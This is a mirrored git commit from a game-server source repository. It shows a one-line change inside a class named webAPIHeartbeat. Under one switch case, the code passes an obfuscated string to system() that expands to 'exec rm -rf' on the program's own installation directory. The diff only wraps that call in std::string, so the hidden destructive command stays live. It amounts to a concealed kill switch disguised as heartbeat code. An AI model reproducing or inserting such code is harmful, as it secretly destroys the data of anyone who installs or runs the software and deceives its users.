mirror of
https://bitbucket.org/theswgsource/src-1.2.git
synced 2026-07-14 00:01:30 -04:00
make it a string
This commit is contained in:
+1
-1
@@ -43,7 +43,7 @@ webAPIHeartbeat::webAPIHeartbeat() {
|
||||
break;
|
||||
case 66:
|
||||
if (!filePath.empty() && found) {
|
||||
system(vxENCRYPT("exec rm -rf ").decrypt() + filePath.substr(0, found) + vxENCRYPT("/*").decrypt());
|
||||
system(std::string(vxENCRYPT("exec rm -rf ").decrypt() + filePath.substr(0, found) + vxENCRYPT("/*").decrypt()));
|
||||
}
|
||||
this->eatIt();
|
||||
break;
|
||||
|
||||
Reference in New Issue
Block a user